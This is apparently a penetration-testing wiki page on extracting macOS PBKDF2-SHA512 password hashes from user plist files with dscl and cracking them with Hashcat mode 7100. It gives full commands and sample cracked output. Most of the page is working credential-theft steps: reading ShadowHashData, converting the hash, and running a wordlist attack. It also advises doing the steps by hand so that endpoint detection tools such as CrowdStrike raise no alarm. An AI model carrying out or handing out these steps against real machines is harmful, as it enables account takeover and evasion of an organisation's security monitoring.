var img = document.createElement('img'); img.src = "https://calabrone.net/piwik.php?idsite=2&rec=1&url=https://stinger.io" + location.pathname; img.style = "border:0"; img.alt = "tracker"; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(img,s);
Skip to main content

Password Cracking

Once you have obtained the user's .plist file from /var/db/dslocal/nodes/Default/users/ you can extract the hash, and format an entry that Hashcat will understand. Modern macOS systems use a PBKDF2-SHA512 hash.

# Get the list of users (if needed)
dscl . -list /Users

# Read the ShadowHashData entry of their .plist file
sudo dscl . -read /Users/steve ShadowHashData >> newuser.hashdata

# Convert the data and write to a .plist file
cat newuser.hashdata | tail -n 1 | xxd -r -p | plutil -convert xml1 - -o newuser.plist

# View the data
cat newuser.plist

Manually convert the hash into Hashcat format for cracking

These steps are provided for manually extracting the hash, and creating a valid hash that can be cracked with Hashcat. In the next section, there is a script that is awesome and will perform this whole process for you and much quicker. Only problem with using this script is that if you macOS host is managed by a Company, the script will set off alarms from security tools such as CrowdStrike or EDR software. Doing this manually does not trip any alarms.

The Hashcat format that we need looks like this:

$ml$<iterations(integer)>$<salt(hex)>$<entropy(hex)>
KeywordDescription
iterationsThis is a simple integer value
saltThis value is in hex, and base64 encoded
entropyThis value is in hex, and base64 encoded

The data we are interested in is the SALTED-SHA512-PBKDF2 entry:

<key>SALTED-SHA512-PBKDF2</key>
<dict>
	<key>entropy</key>
	<data>
	fN0UaJVva6Fbqjkfrwdem2jJJHsDilfZFs9U4mAdsptZLC6r/nKMVBIQH5IU
	auXBW/E4PwGDsczqONxE2fUQ0dkOgAKRVwnAghsIjdYxLsuK8v49MfqYgHUm
	+c2oWGC6odhO6KPBpSOSGTcuAuJh6s6db995GrN5eT/zbENFrDg=
	</data>
	<key>iterations</key>
	<integer>123456</integer>
	<key>salt</key>
	<data>
	2sVKYYXpCALwLH6uHzzeH/0KgaPbl++OW0baubgcJwo=
	</data>
</dict>

The iteractions data is a simple integer value that we can just copy out for the Hashcat format.

After that, we will calculate the salt value and write it out to a file called salt:

echo "2sVKYYXpCALwLH6uHzzeH/0KgaPbl++OW0baubgcJwo=" | base64 -D | xxd -p | tr -d \\n > salt

cat salt
dac54a6185e90802f02c7eae1f3cde1ffd0a81a3db97ef8e5b46dab9b81c270a

Next, calculate the entropy value and write it out to a file called entropy:

echo "fN0UaJVva6Fbqjkfrwdem2jJJHsDilfZFs9U4mAdsptZLC6r/nKMVBIQH5IUauXBW/E4PwGDsczqONxE2fUQ0dkOgAKRVwnAghsIjdYxLsuK8v49MfqYgHUm+c2oWGC6odhO6KPBpSOSGTcuAuJh6s6db995GrN5eT/zbENFrDg=" | base64 -D | xxd -p | tr -d \\n > entropy                        

cat entropy
7cdd1468956f6ba15baa391faf075e9b68c9247b038a57d916cf54e2601db29b592c2eabfe728c5412101f92146ae5c15bf1383f0183b1ccea38dc44d9f510d1d90e8002915709c0821b088dd6312ecb8af2fe3d31fa98807526f9cda85860baa1d84ee8a3c1a5239219372e02e261eace9d6fdf791ab379793ff36c4345ac38

Putting this together in the format mentioned in the beginning, the full value is. Save this out to a file called hash.txt

$ml$123456$dac54a6185e90802f02c7eae1f3cde1ffd0a81a3db97ef8e5b46dab9b81c270a$7cdd1468956f6ba15baa391faf075e9b68c9247b038a57d916cf54e2601db29b592c2eabfe728c5412101f92146ae5c15bf1383f0183b1ccea38dc44d9f510d1d90e8002915709c0821b088dd6312ecb8af2fe3d31fa98807526f9cda85860baa1d84ee8a3c1a5239219372e02e261eace9d6fdf791ab379793ff36c4345ac38

Automated conversion of the hash into Hashcat format for cracking

This script will be detected by security software. Use at your own risk!

https://gist.github.com/teddziuba/3ff08bdda120d1f7822f3baf52e606c2

python3 osx_extract_hash.py username

This output will use the username as a prefix to the Hashcat format. Therefore, you will need to alter the Hashcat command to include the --username option. Review the header comments of the script for more information.

Run Hashcat to attempt cracking the password

Get the Hashcat mode for macOS. In this case, we need the PBKDF2-SHA512 mode of 7100:

hashcat --help | grep -i macos
    122 | macOS v10.4, macOS v10.5, macOS v10.6     | Operating System
   1722 | macOS v10.7                               | Operating System
   7100 | macOS v10.8+ (PBKDF2-SHA512)              | Operating System

Run hashcat to crack the password hash using a password list:

hashcat -a 0 -m 7100 hash.txt wordlist.txt

# or if you used the script:
hashcat -a 0 -m 7100 --username hash.txt wordlist.txt

Sample output:

(truncate data)

...

$ml$123456$dac54a6185e90802f02c7eae1f3cde1ffd0a81a3db97ef8e5b46dab9b81c270a$7cdd1468956f6ba15baa391faf075e9b68c9247b038a57d916cf54e2601db29b592c2eabfe728c5412101f92146ae5c15bf1383f0183b1ccea38dc44d9f510d1d90e8002915709c0821b088dd6312ecb8af2fe3d31fa98807526f9cda85860baa1d84ee8a3c1a5239219372e02e261eace9d6fdf791ab379793ff36c4345ac38:P@ssw0rd
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 7100 (macOS v10.8+ (PBKDF2-SHA512))
Hash.Target......: $ml$123456$dac54a6185e90802f02c7eae1f3cde1ffd0a81a3...45ac38
Time.Started.....: Sat Jan  4 12:30:15 2025 (22 secs)
Time.Estimated...: Sat Jan  4 12:30:37 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (password.lst)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:        0 H/s (0.95ms) @ Accel:96 Loops:8 Thr:32 Vec:1
Speed.#2.........:        0 H/s (0.00ms) @ Accel:64 Loops:128 Thr:128 Vec:1
Speed.#*.........:        0 H/s
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5/5 (100.00%)
Rejected.........: 0/5 (0.00%)
Restore.Point....: 0/5 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:123448-123455
Restore.Sub.#2...: Salt:0 Amplifier:0-0 Iteration:0-128
Candidate.Engine.: Device Generator
Candidates.#1....: password -> P@ssw0rd
Candidates.#2....: [Copying]
Hardware.Mon.#1..: Util: 81%
Hardware.Mon.#2..: Util:  0%

[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => Started: Sat Jan  4 12:29:46 2025
Stopped: Sat Jan  4 12:30:38 2025

Show the cracked password. The output will be in a formate of hash:password. In this case the password is P@ssw0rd.

hashcat -m 7100 hash.txt -a 0 password.lst --show
$ml$123456$dac54a6185e90802f02c7eae1f3cde1ffd0a81a3db97ef8e5b46dab9b81c270a$7cdd1468956f6ba15baa391faf075e9b68c9247b038a57d916cf54e2601db29b592c2eabfe728c5412101f92146ae5c15bf1383f0183b1ccea38dc44d9f510d1d90e8002915709c0821b088dd6312ecb8af2fe3d31fa98807526f9cda85860baa1d84ee8a3c1a5239219372e02e261eace9d6fdf791ab379793ff36c4345ac38:P@ssw0rd

NOTE: It is recommended to perform only a wordlist attack since the time to perform a brute-force attack will take decades to complete.